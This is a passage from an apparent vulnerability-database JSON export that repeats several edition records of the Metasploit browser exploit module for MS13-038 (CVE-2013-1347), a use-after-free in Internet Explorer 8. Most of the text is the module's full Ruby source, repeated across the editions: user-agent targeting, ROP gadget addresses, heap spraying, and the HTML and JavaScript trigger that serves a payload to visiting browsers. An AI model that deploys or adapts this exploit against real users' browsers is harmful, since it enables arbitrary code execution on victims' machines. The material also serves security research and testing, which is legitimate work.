ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-08T18:11:31", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-08T20:11:42", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-08T20:11:42"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-08T20:11:42", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-20T14:57:39", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-20T14:57:39"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-20T14:57:39", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-20T16:55:16", "history": [], "viewCount": 65, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-20T16:55:16"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-20T16:55:16", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-25T16:58:04", "history": [], "viewCount": 65, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-25T16:58:04"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP 